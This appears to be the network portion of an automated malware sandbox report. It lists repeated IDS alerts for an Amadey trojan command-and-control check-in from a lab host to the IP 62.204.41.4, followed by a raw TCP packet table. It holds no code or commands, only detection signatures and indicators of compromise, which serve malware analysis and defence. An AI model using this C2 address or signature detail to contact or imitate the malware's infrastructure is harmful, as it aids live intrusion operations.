192.168.2.562.204.41.450086802027700 02/07/23-19:58:50.782617	TCP	2027700	ET TROJAN Amadey CnC Check-In	50086	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450282802027700 02/07/23-19:59:45.658356	TCP	2027700	ET TROJAN Amadey CnC Check-In	50282	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450203802027700 02/07/23-19:59:22.078648	TCP	2027700	ET TROJAN Amadey CnC Check-In	50203	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449954802027700 02/07/23-19:58:14.184522	TCP	2027700	ET TROJAN Amadey CnC Check-In	49954	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449758802027700 02/07/23-19:57:19.484125	TCP	2027700	ET TROJAN Amadey CnC Check-In	49758	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450043802027700 02/07/23-19:58:37.945632	TCP	2027700	ET TROJAN Amadey CnC Check-In	50043	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450002802027700 02/07/23-19:58:27.980529	TCP	2027700	ET TROJAN Amadey CnC Check-In	50002	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450221802027700 02/07/23-19:59:28.870563	TCP	2027700	ET TROJAN Amadey CnC Check-In	50221	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449946802027700 02/07/23-19:58:12.312159	TCP	2027700	ET TROJAN Amadey CnC Check-In	49946	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450316802027700 02/07/23-19:59:53.881599	TCP	2027700	ET TROJAN Amadey CnC Check-In	50316	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450470802027700 02/07/23-20:00:35.113671	TCP	2027700	ET TROJAN Amadey CnC Check-In	50470	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449969802027700 02/07/23-19:58:17.745575	TCP	2027700	ET TROJAN Amadey CnC Check-In	49969	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450020802027700 02/07/23-19:58:32.557219	TCP	2027700	ET TROJAN Amadey CnC Check-In	50020	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449928802027700 02/07/23-19:58:08.200692	TCP	2027700	ET TROJAN Amadey CnC Check-In	49928	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450061802027700 02/07/23-19:58:42.609485	TCP	2027700	ET TROJAN Amadey CnC Check-In	50061	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449768802027700 02/07/23-19:57:21.340554	TCP	2027700	ET TROJAN Amadey CnC Check-In	49768	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449987802027700 02/07/23-19:58:22.091332	TCP	2027700	ET TROJAN Amadey CnC Check-In	49987	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450292802027700 02/07/23-19:59:48.086269	TCP	2027700	ET TROJAN Amadey CnC Check-In	50292	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449763802027700 02/07/23-19:57:20.363784	TCP	2027700	ET TROJAN Amadey CnC Check-In	49763	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449964802027700 02/07/23-19:58:16.564709	TCP	2027700	ET TROJAN Amadey CnC Check-In	49964	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450369802027700 02/07/23-20:00:08.954484	TCP	2027700	ET TROJAN Amadey CnC Check-In	50369	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450387802027700 02/07/23-20:00:13.346042	TCP	2027700	ET TROJAN Amadey CnC Check-In	50387	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449786802027700 02/07/23-19:57:28.358002	TCP	2027700	ET TROJAN Amadey CnC Check-In	49786	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449982802027700 02/07/23-19:58:20.917525	TCP	2027700	ET TROJAN Amadey CnC Check-In	49982	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450091802027700 02/07/23-19:58:52.034089	TCP	2027700	ET TROJAN Amadey CnC Check-In	50091	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450211802027700 02/07/23-19:59:26.414967	TCP	2027700	ET TROJAN Amadey CnC Check-In	50211	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449959802027700 02/07/23-19:58:15.371241	TCP	2027700	ET TROJAN Amadey CnC Check-In	49959	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450404802027700 02/07/23-20:00:17.416361	TCP	2027700	ET TROJAN Amadey CnC Check-In	50404	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449800802027700 02/07/23-19:57:31.745131	TCP	2027700	ET TROJAN Amadey CnC Check-In	49800	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450033802027700 02/07/23-19:58:35.799544	TCP	2027700	ET TROJAN Amadey CnC Check-In	50033	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450030802027700 02/07/23-19:58:35.059294	TCP	2027700	ET TROJAN Amadey CnC Check-In	50030	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450367802027700 02/07/23-20:00:08.484564	TCP	2027700	ET TROJAN Amadey CnC Check-In	50367	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450382802027700 02/07/23-20:00:12.143005	TCP	2027700	ET TROJAN Amadey CnC Check-In	50382	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450189802027700 02/07/23-19:59:18.468588	TCP	2027700	ET TROJAN Amadey CnC Check-In	50189	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450459802027700 02/07/23-20:00:32.490579	TCP	2027700	ET TROJAN Amadey CnC Check-In	50459	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449956802027700 02/07/23-19:58:14.672244	TCP	2027700	ET TROJAN Amadey CnC Check-In	49956	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450107802027700 02/07/23-19:58:55.941894	TCP	2027700	ET TROJAN Amadey CnC Check-In	50107	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450339802027700 02/07/23-19:59:59.425942	TCP	2027700	ET TROJAN Amadey CnC Check-In	50339	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450048802027700 02/07/23-19:58:39.136453	TCP	2027700	ET TROJAN Amadey CnC Check-In	50048	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449778802027700 02/07/23-19:57:24.022380	TCP	2027700	ET TROJAN Amadey CnC Check-In	49778	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449892802027700 02/07/23-19:57:57.200519	TCP	2027700	ET TROJAN Amadey CnC Check-In	49892	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450241802027700 02/07/23-19:59:33.653837	TCP	2027700	ET TROJAN Amadey CnC Check-In	50241	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450397802027700 02/07/23-20:00:15.752527	TCP	2027700	ET TROJAN Amadey CnC Check-In	50397	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450440802027700 02/07/23-20:00:28.144249	TCP	2027700	ET TROJAN Amadey CnC Check-In	50440	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450226802027700 02/07/23-19:59:30.062964	TCP	2027700	ET TROJAN Amadey CnC Check-In	50226	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449821802027700 02/07/23-19:57:36.603814	TCP	2027700	ET TROJAN Amadey CnC Check-In	49821	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450063802027700 02/07/23-19:58:43.919705	TCP	2027700	ET TROJAN Amadey CnC Check-In	50063	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449773802027700 02/07/23-19:57:22.545756	TCP	2027700	ET TROJAN Amadey CnC Check-In	49773	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450318802027700 02/07/23-19:59:54.361124	TCP	2027700	ET TROJAN Amadey CnC Check-In	50318	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449913802027700 02/07/23-19:58:02.266316	TCP	2027700	ET TROJAN Amadey CnC Check-In	49913	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449992802027700 02/07/23-19:58:23.691995	TCP	2027700	ET TROJAN Amadey CnC Check-In	49992	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449995802027700 02/07/23-19:58:25.960796	TCP	2027700	ET TROJAN Amadey CnC Check-In	49995	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450354802027700 02/07/23-20:00:05.364849	TCP	2027700	ET TROJAN Amadey CnC Check-In	50354	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449735802027700 02/07/23-19:57:14.444183	TCP	2027700	ET TROJAN Amadey CnC Check-In	49735	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449776802027700 02/07/23-19:57:23.344979	TCP	2027700	ET TROJAN Amadey CnC Check-In	49776	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450432802027700 02/07/23-20:00:26.215534	TCP	2027700	ET TROJAN Amadey CnC Check-In	50432	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450313802027700 02/07/23-19:59:53.159401	TCP	2027700	ET TROJAN Amadey CnC Check-In	50313	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449854802027700 02/07/23-19:57:48.147586	TCP	2027700	ET TROJAN Amadey CnC Check-In	49854	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450395802027700 02/07/23-20:00:15.267609	TCP	2027700	ET TROJAN Amadey CnC Check-In	50395	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450005802027700 02/07/23-19:58:28.753873	TCP	2027700	ET TROJAN Amadey CnC Check-In	50005	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449984802027700 02/07/23-19:58:21.387139	TCP	2027700	ET TROJAN Amadey CnC Check-In	49984	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450176802027700 02/07/23-19:59:15.314802	TCP	2027700	ET TROJAN Amadey CnC Check-In	50176	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449813802027700 02/07/23-19:57:34.897396	TCP	2027700	ET TROJAN Amadey CnC Check-In	49813	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450135802027700 02/07/23-19:59:05.579215	TCP	2027700	ET TROJAN Amadey CnC Check-In	50135	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449926802027700 02/07/23-19:58:07.720137	TCP	2027700	ET TROJAN Amadey CnC Check-In	49926	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449707802027700 02/07/23-19:57:08.383912	TCP	2027700	ET TROJAN Amadey CnC Check-In	49707	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450071802027700 02/07/23-19:58:47.153403	TCP	2027700	ET TROJAN Amadey CnC Check-In	50071	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450254802027700 02/07/23-19:59:36.757803	TCP	2027700	ET TROJAN Amadey CnC Check-In	50254	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450326802027700 02/07/23-19:59:56.296800	TCP	2027700	ET TROJAN Amadey CnC Check-In	50326	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450290802027700 02/07/23-19:59:47.592742	TCP	2027700	ET TROJAN Amadey CnC Check-In	50290	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449748802027700 02/07/23-19:57:17.627780	TCP	2027700	ET TROJAN Amadey CnC Check-In	49748	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449967802027700 02/07/23-19:58:17.264761	TCP	2027700	ET TROJAN Amadey CnC Check-In	49967	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450076802027700 02/07/23-19:58:48.365768	TCP	2027700	ET TROJAN Amadey CnC Check-In	50076	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450295802027700 02/07/23-19:59:48.802433	TCP	2027700	ET TROJAN Amadey CnC Check-In	50295	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450213802027700 02/07/23-19:59:26.928062	TCP	2027700	ET TROJAN Amadey CnC Check-In	50213	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450035802027700 02/07/23-19:58:36.040025	TCP	2027700	ET TROJAN Amadey CnC Check-In	50035	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449789802027700 02/07/23-19:57:29.074930	TCP	2027700	ET TROJAN Amadey CnC Check-In	49789	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450056802027700 02/07/23-19:58:41.093535	TCP	2027700	ET TROJAN Amadey CnC Check-In	50056	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450145802027700 02/07/23-19:59:07.823731	TCP	2027700	ET TROJAN Amadey CnC Check-In	50145	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449783802027700 02/07/23-19:57:27.313901	TCP	2027700	ET TROJAN Amadey CnC Check-In	49783	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449933802027700 02/07/23-19:58:09.387568	TCP	2027700	ET TROJAN Amadey CnC Check-In	49933	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449961802027700 02/07/23-19:58:15.841480	TCP	2027700	ET TROJAN Amadey CnC Check-In	49961	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449844802027700 02/07/23-19:57:42.215376	TCP	2027700	ET TROJAN Amadey CnC Check-In	49844	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450111802027700 02/07/23-19:58:56.896574	TCP	2027700	ET TROJAN Amadey CnC Check-In	50111	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450463802027700 02/07/23-20:00:33.458704	TCP	2027700	ET TROJAN Amadey CnC Check-In	50463	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450117802027700 02/07/23-19:58:58.328195	TCP	2027700	ET TROJAN Amadey CnC Check-In	50117	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450469802027700 02/07/23-20:00:34.879330	TCP	2027700	ET TROJAN Amadey CnC Check-In	50469	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449755802027700 02/07/23-19:57:18.963514	TCP	2027700	ET TROJAN Amadey CnC Check-In	49755	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450200802027700 02/07/23-19:59:20.859043	TCP	2027700	ET TROJAN Amadey CnC Check-In	50200	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450206802027700 02/07/23-19:59:23.596825	TCP	2027700	ET TROJAN Amadey CnC Check-In	50206	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449951802027700 02/07/23-19:58:13.482140	TCP	2027700	ET TROJAN Amadey CnC Check-In	49951	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450285802027700 02/07/23-19:59:46.406219	TCP	2027700	ET TROJAN Amadey CnC Check-In	50285	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449939802027700 02/07/23-19:58:10.592369	TCP	2027700	ET TROJAN Amadey CnC Check-In	49939	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450022802027700 02/07/23-19:58:33.047755	TCP	2027700	ET TROJAN Amadey CnC Check-In	50022	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450374802027700 02/07/23-20:00:10.203248	TCP	2027700	ET TROJAN Amadey CnC Check-In	50374	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449905802027700 02/07/23-19:58:00.330109	TCP	2027700	ET TROJAN Amadey CnC Check-In	49905	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450196802027700 02/07/23-19:59:19.903167	TCP	2027700	ET TROJAN Amadey CnC Check-In	50196	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450066802027700 02/07/23-19:58:45.929274	TCP	2027700	ET TROJAN Amadey CnC Check-In	50066	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450351802027700 02/07/23-20:00:04.658670	TCP	2027700	ET TROJAN Amadey CnC Check-In	50351	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450173802027700 02/07/23-19:59:14.605094	TCP	2027700	ET TROJAN Amadey CnC Check-In	50173	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450392802027700 02/07/23-20:00:14.550844	TCP	2027700	ET TROJAN Amadey CnC Check-In	50392	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449816802027700 02/07/23-19:57:35.633778	TCP	2027700	ET TROJAN Amadey CnC Check-In	49816	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450262802027700 02/07/23-19:59:38.726303	TCP	2027700	ET TROJAN Amadey CnC Check-In	50262	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449793802027700 02/07/23-19:57:30.034311	TCP	2027700	ET TROJAN Amadey CnC Check-In	49793	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450084802027700 02/07/23-19:58:50.307278	TCP	2027700	ET TROJAN Amadey CnC Check-In	50084	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449882802027700 02/07/23-19:57:54.716706	TCP	2027700	ET TROJAN Amadey CnC Check-In	49882	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450257802027700 02/07/23-19:59:37.493308	TCP	2027700	ET TROJAN Amadey CnC Check-In	50257	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449704802027700 02/07/23-19:57:06.319925	TCP	2027700	ET TROJAN Amadey CnC Check-In	49704	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449923802027700 02/07/23-19:58:06.395394	TCP	2027700	ET TROJAN Amadey CnC Check-In	49923	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449971802027700 02/07/23-19:58:18.215583	TCP	2027700	ET TROJAN Amadey CnC Check-In	49971	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450127802027700 02/07/23-19:59:00.745196	TCP	2027700	ET TROJAN Amadey CnC Check-In	50127	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450323802027700 02/07/23-19:59:55.559779	TCP	2027700	ET TROJAN Amadey CnC Check-In	50323	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450412802027700 02/07/23-20:00:19.610273	TCP	2027700	ET TROJAN Amadey CnC Check-In	50412	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449727802027700 02/07/23-19:57:12.532928	TCP	2027700	ET TROJAN Amadey CnC Check-In	49727	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450168802027700 02/07/23-19:59:13.420495	TCP	2027700	ET TROJAN Amadey CnC Check-In	50168	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450038802027700 02/07/23-19:58:36.760813	TCP	2027700	ET TROJAN Amadey CnC Check-In	50038	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450234802027700 02/07/23-19:59:31.956332	TCP	2027700	ET TROJAN Amadey CnC Check-In	50234	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449745802027700 02/07/23-19:57:16.898023	TCP	2027700	ET TROJAN Amadey CnC Check-In	49745	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450216802027700 02/07/23-19:59:27.644779	TCP	2027700	ET TROJAN Amadey CnC Check-In	50216	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450364802027700 02/07/23-20:00:07.781571	TCP	2027700	ET TROJAN Amadey CnC Check-In	50364	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450435802027700 02/07/23-20:00:26.957152	TCP	2027700	ET TROJAN Amadey CnC Check-In	50435	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450453802027700 02/07/23-20:00:31.268227	TCP	2027700	ET TROJAN Amadey CnC Check-In	50453	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449834802027700 02/07/23-19:57:39.774939	TCP	2027700	ET TROJAN Amadey CnC Check-In	49834	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450346802027700 02/07/23-20:00:03.180456	TCP	2027700	ET TROJAN Amadey CnC Check-In	50346	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450050802027700 02/07/23-19:58:39.622154	TCP	2027700	ET TROJAN Amadey CnC Check-In	50050	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450305802027700 02/07/23-19:59:51.225446	TCP	2027700	ET TROJAN Amadey CnC Check-In	50305	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450180802027700 02/07/23-19:59:16.281335	TCP	2027700	ET TROJAN Amadey CnC Check-In	50180	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450186802027700 02/07/23-19:59:17.709490	TCP	2027700	ET TROJAN Amadey CnC Check-In	50186	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450183802027700 02/07/23-19:59:16.984626	TCP	2027700	ET TROJAN Amadey CnC Check-In	50183	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450094802027700 02/07/23-19:58:52.753337	TCP	2027700	ET TROJAN Amadey CnC Check-In	50094	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450275802027700 02/07/23-19:59:42.829008	TCP	2027700	ET TROJAN Amadey CnC Check-In	50275	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449803802027700 02/07/23-19:57:32.447940	TCP	2027700	ET TROJAN Amadey CnC Check-In	49803	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450097802027700 02/07/23-19:58:53.510976	TCP	2027700	ET TROJAN Amadey CnC Check-In	50097	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450015802027700 02/07/23-19:58:31.307259	TCP	2027700	ET TROJAN Amadey CnC Check-In	50015	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450336802027700 02/07/23-19:59:58.703262	TCP	2027700	ET TROJAN Amadey CnC Check-In	50336	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449974802027700 02/07/23-19:58:18.969301	TCP	2027700	ET TROJAN Amadey CnC Check-In	49974	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449977802027700 02/07/23-19:58:19.705616	TCP	2027700	ET TROJAN Amadey CnC Check-In	49977	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450247802027700 02/07/23-19:59:35.069047	TCP	2027700	ET TROJAN Amadey CnC Check-In	50247	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449714802027700 02/07/23-19:57:10.084490	TCP	2027700	ET TROJAN Amadey CnC Check-In	49714	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449885802027700 02/07/23-19:57:55.454532	TCP	2027700	ET TROJAN Amadey CnC Check-In	49885	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450155802027700 02/07/23-19:59:10.245942	TCP	2027700	ET TROJAN Amadey CnC Check-In	50155	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449888802027700 02/07/23-19:57:56.245210	TCP	2027700	ET TROJAN Amadey CnC Check-In	49888	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449806802027700 02/07/23-19:57:33.169488	TCP	2027700	ET TROJAN Amadey CnC Check-In	49806	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450422802027700 02/07/23-20:00:23.830241	TCP	2027700	ET TROJAN Amadey CnC Check-In	50422	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450425802027700 02/07/23-20:00:24.567398	TCP	2027700	ET TROJAN Amadey CnC Check-In	50425	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449799802027700 02/07/23-19:57:31.508216	TCP	2027700	ET TROJAN Amadey CnC Check-In	49799	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450244802027700 02/07/23-19:59:34.357275	TCP	2027700	ET TROJAN Amadey CnC Check-In	50244	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450333802027700 02/07/23-19:59:57.984722	TCP	2027700	ET TROJAN Amadey CnC Check-In	50333	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449908802027700 02/07/23-19:58:01.073849	TCP	2027700	ET TROJAN Amadey CnC Check-In	49908	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450040802027700 02/07/23-19:58:37.231251	TCP	2027700	ET TROJAN Amadey CnC Check-In	50040	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450199802027700 02/07/23-19:59:20.621768	TCP	2027700	ET TROJAN Amadey CnC Check-In	50199	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449796802027700 02/07/23-19:57:30.765231	TCP	2027700	ET TROJAN Amadey CnC Check-In	49796	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450288802027700 02/07/23-19:59:47.126534	TCP	2027700	ET TROJAN Amadey CnC Check-In	50288	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450308802027700 02/07/23-19:59:51.952268	TCP	2027700	ET TROJAN Amadey CnC Check-In	50308	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450158802027700 02/07/23-19:59:10.996736	TCP	2027700	ET TROJAN Amadey CnC Check-In	50158	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450028802027700 02/07/23-19:58:34.553699	TCP	2027700	ET TROJAN Amadey CnC Check-In	50028	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450069802027700 02/07/23-19:58:46.668672	TCP	2027700	ET TROJAN Amadey CnC Check-In	50069	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449920802027700 02/07/23-19:58:04.285165	TCP	2027700	ET TROJAN Amadey CnC Check-In	49920	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450349802027700 02/07/23-20:00:04.188949	TCP	2027700	ET TROJAN Amadey CnC Check-In	50349	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449831802027700 02/07/23-19:57:39.071348	TCP	2027700	ET TROJAN Amadey CnC Check-In	49831	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450219802027700 02/07/23-19:59:28.398284	TCP	2027700	ET TROJAN Amadey CnC Check-In	50219	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449701802027700 02/07/23-19:57:04.541289	TCP	2027700	ET TROJAN Amadey CnC Check-In	49701	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449742802027700 02/07/23-19:57:16.147994	TCP	2027700	ET TROJAN Amadey CnC Check-In	49742	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450012802027700 02/07/23-19:58:30.553987	TCP	2027700	ET TROJAN Amadey CnC Check-In	50012	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450361802027700 02/07/23-20:00:07.031777	TCP	2027700	ET TROJAN Amadey CnC Check-In	50361	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450438802027700 02/07/23-20:00:27.675588	TCP	2027700	ET TROJAN Amadey CnC Check-In	50438	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449819802027700 02/07/23-19:57:36.373215	TCP	2027700	ET TROJAN Amadey CnC Check-In	49819	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449949802027700 02/07/23-19:58:13.013964	TCP	2027700	ET TROJAN Amadey CnC Check-In	49949	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450142802027700 02/07/23-19:59:07.121016	TCP	2027700	ET TROJAN Amadey CnC Check-In	50142	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450101802027700 02/07/23-19:58:54.467418	TCP	2027700	ET TROJAN Amadey CnC Check-In	50101	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450450802027700 02/07/23-20:00:30.549660	TCP	2027700	ET TROJAN Amadey CnC Check-In	50450	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450272802027700 02/07/23-19:59:41.450711	TCP	2027700	ET TROJAN Amadey CnC Check-In	50272	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450231802027700 02/07/23-19:59:31.231345	TCP	2027700	ET TROJAN Amadey CnC Check-In	50231	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450320802027700 02/07/23-19:59:54.828975	TCP	2027700	ET TROJAN Amadey CnC Check-In	50320	80	192.168.2.5	62.204.41.4

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Feb 7, 2023 19:57:03.546092033 CET	49698	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:03.546333075 CET	49697	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:03.605668068 CET	80	49698	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:03.605837107 CET	49698	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:03.608742952 CET	80	49697	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:03.609515905 CET	49697	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:03.625298977 CET	49698	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:03.625893116 CET	49697	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:03.684655905 CET	80	49698	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:03.684715986 CET	80	49698	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:03.684825897 CET	49698	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:03.688357115 CET	80	49697	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:03.692217112 CET	80	49697	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:03.692430019 CET	49697	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:03.702605963 CET	49697	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:03.765177965 CET	80	49697	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:03.765212059 CET	80	49697	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:03.765239954 CET	80	49697	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:03.765266895 CET	80	49697	62.204.41.4	192.168.2.5
